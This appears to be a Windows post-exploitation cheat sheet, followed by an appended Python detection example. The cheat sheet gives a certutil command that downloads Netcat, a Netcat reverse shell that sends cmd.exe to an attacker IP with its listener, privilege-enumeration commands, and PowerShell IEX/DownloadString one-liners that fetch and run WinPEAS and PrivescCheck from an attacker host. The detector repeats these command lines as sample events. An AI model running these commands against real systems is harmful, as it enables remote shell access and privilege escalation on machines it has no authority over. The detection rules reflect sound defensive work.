Utils

1. File Transfer using certutil

Transfer a file from a remote server to the target machine:

certutil -urlcache -f http://10.10.31.2/nc.exe nc.exe
  • certutil is a built-in Windows utility that can be used for file transfers.

  • -urlcache selects certutil's URL-cache action and -f forces a fresh download from the given URL, overwriting any cached copy; the final argument is the local file name to write.

  • nc.exe (Netcat) is saved to the local machine.


2. Connect to Listener using Netcat

After transferring Netcat, establish a reverse shell:

nc.exe -nv 10.10.0.2 1234 -e cmd.exe
  • -n : No DNS resolution

  • -v : Verbose mode

  • 10.10.0.2 1234 : Attacker’s IP and port

  • -e cmd.exe : Executes a command shell on the target

Note: Ensure a Netcat listener is running on the attack machine:

nc -lvnp 1234

3. Privilege Escalation Check

Run privilege checks to identify potential escalation paths:

whoami /priv
  • Lists available privileges.

  • Look for SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, etc.

Additional enumeration tools:

systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn
  • systeminfo: Gathers OS and patch details.

  • wmic qfe get ...: Lists installed updates (hotfixes) with their IDs and install dates, which is used to spot missing patches.

For automated privilege escalation enumeration:

  • Use WinPEAS:

powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/winpeas.ps1')"
  • Use PrivescCheck:

powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/privesccheck.ps1')"
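As an added defender's-side example (not part of the original page), the following Python runs simple detection rules for the three techniques listed above (certutil URL download, Netcat with -e, and PowerShell IEX/DownloadString) over constructed Sysmon-style process-creation events; the event tuples, rule names and regexes are assumptions for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 / Security 4688 style),
# not real log data; each entry is (image path, command line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil -urlcache -f http://10.10.31.2/nc.exe nc.exe"),
    ("C:\\Windows\\System32\\certutil.exe", "certutil -verify cert.cer"),
    ("C:\\Users\\Public\\nc.exe", "nc.exe -nv 10.10.0.2 1234 -e cmd.exe"),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.10.31.2/winpeas.ps1')\""),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "powershell -c Get-Date"),
]

# Each rule: (name, image basename to require or None for any image, regex over the command line).
RULES = [
    # certutil fetching from an http(s) URL via its URL-cache verb (accepts -urlcache or /urlcache)
    ("certutil_url_download", "certutil.exe",
     re.compile(r"[-/]urlcache\b.*\bhttps?://", re.I)),
    # any binary (netcat is often renamed) handing a shell to a connection with -e
    ("netcat_exec_shell", None,
     re.compile(r"(^|\s)-e\s+\S*(cmd|powershell)(\.exe)?\b", re.I)),
    # PowerShell executing a remotely downloaded script string in memory
    ("powershell_remote_script_exec", "powershell.exe",
     re.compile(r"(?=.*(?:\biex\b|invoke-expression))(?=.*downloadstring)", re.I)),
]


def scan_events(events):
    """Return a list of (rule name, command line) alerts for the given events."""
    alerts = []
    for image, cmdline in events:
        base = image.rsplit("\\", 1)[-1].lower()
        for name, image_filter, pattern in RULES:
            if image_filter and base != image_filter:
                continue
            if pattern.search(cmdline):
                alerts.append((name, cmdline))
    return alerts


if __name__ == "__main__":
    for rule, cmdline in scan_events(SAMPLE_EVENTS):
        print(f"[{rule}] {cmdline}")
```

Benign certutil use (-verify) and plain PowerShell commands produce no alert, which is the false-positive check worth keeping when tuning these rules.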
